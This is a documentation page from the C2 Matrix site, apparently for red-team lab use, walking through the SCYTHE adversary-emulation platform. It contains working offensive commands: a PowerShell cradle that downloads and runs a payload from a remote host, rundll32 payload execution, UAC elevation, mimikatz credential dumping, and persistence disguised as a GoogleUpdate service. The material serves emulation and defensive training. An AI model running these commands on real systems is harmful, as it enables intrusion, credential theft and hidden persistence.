C2 Matrix
C2 Matrix
C2 Matrix
C2 Matrix
The C2 Matrix
SANS Slingshot C2 Matrix Edition
Contribute
Lab Infrastructure
C2 Matrix Eval Lab
Basic Lab
Virtual Machines with C2s
Docker
Resources
C2
Caldera
Covenant
Empire
Faction
ibombshell
Koadic
Merlin
Mythic
Nuages
PoshC2
PowerHub
SilentTrinity
Sliver
SCYTHE
TrevorC2
Attack Infrastructure
Resources
Redirectors/Relays
Detection
Basics
Beacons
JA3/JA3S Hashes
JARM
Powered by GitBook

SCYTHE

Setup Campaign

Login to your SCYTHE instance via web browser. Default port is 8443.

​https://localhost:8443​

Campaign Manager - New Campaign

Select the following options:

  • Name: unique name for the campaign

  • Target Operating System: Windows, Linux, or macOS

  • Restrict Campaign through Execution Guardrails (T1480) by Device, Domain, Start Date, and/or End Date

  • Communication Module:

    • HTTPS is default,

    • DNS, HTTP, and Stego require relays to be installed on redirector

    • Google Sheet and Twitter require third party account/API

Community Threats (Third Party Adversary Emulation Plans)

Download Community Threats from SCYTHE Github: https://github.com/scythe-io/community-threats​

Import into SCYTHE: Threat Manager - Migrate Threats - Choose File - Import

Migrate Threats

Use a Threat: Threat Manager - Threat Catalog - Click Threat - Create Campaign from Threat

Deploy Payload

User Execution: Malicious File (T1204.002):

Download the binary to the target system and execute by double clicking.

Signed Binary Proxy Execution: Rundll32 (T1218.011):

Download DLL file from SCYTHE and execute below from a cmd.exe:

rundll32.exe ServiceLogin.dll,PlatformClientMain

Command and Scripting Interpreter: PowerShell (T1059.001)

Open a powershell.exe and run:

$myscriptblock={$url="https://madrid.scythedemo.com/ServiceLogin?active=K17coQ7Y6E-jJExc8Y_-8w&b=false";$wc=New-Object System.Net.WebClient;$output="C:\Users\Public\scythe_payload.exe";$wc.DownloadFile($url,$output);C:\Users\Public\scythe_payload.exe};Invoke-Command -ScriptBlock $myscriptblock;

Emulate TTPs

loader --load run
run whoami
run cmd /c whoami

Load Python Runtime

loader --load-runtime python3
list modules
loader --load "modulename"
"modulename"

Download files

Move file to virtual file system

loader --load downloader 
downloader --src VFS:/users/BUILTIN/scythe/DNS_scythe_client32.dll --dest C:\Users\sec564\DNS_scythe_client32.dll

Privilege Escalation (TA0004)

UAC (T1088)

loader --load elevate 
elevate --prompt

Credential Access (TA0006)

Credential Dumping (T1003)

loader --load mimikatz
mimikatz --arglist privilege::debug
mimikatz --arglist sekurlsa::logonPasswords

Persistence (TA0003)

New Service (T1050)

loader --load persist 
​
Synatax: 
persist --hostname "Hostname" --name "Name of Service" --display "Display Name of Service" --description mysvc --path \\"hostname"\C$\"location"
​
Example:
persist --hostname WIN10-VICTIM1 --name GoogleUpdate --display GoogleUpdate --description GoogleUpdate --path \\WIN10-VICTIM1\C$\Windows\Temp\GoogleUpdate.exe

Scheduled Task (T1168)

schtasks /create /tn DNS /sc ONLOGON /tr "cmd.exe /k rundll32.exe C:\Users\\DNS_scythe_client32.dll,PlatformClientMain"

Clean up

Persistence:

run sc delete GoogleUpdate
run del C:\Windows\Temp\GoogleUpdate.exe

Kill agent:

controller --shutdown
C2 - Previous
Sliver
Next - C2
TrevorC2
Last updated 9 months ago
Contents
Setup Campaign
Community Threats (Third Party Adversary Emulation Plans)
Deploy Payload
User Execution: Malicious File (T1204.002):
Signed Binary Proxy Execution: Rundll32 (T1218.011):
Command and Scripting Interpreter: PowerShell (T1059.001)
Emulate TTPs
Load Python Runtime
Download files
Privilege Escalation (TA0004)
Credential Access (TA0006)
Persistence (TA0003)
Clean up
Persistence:
Kill agent: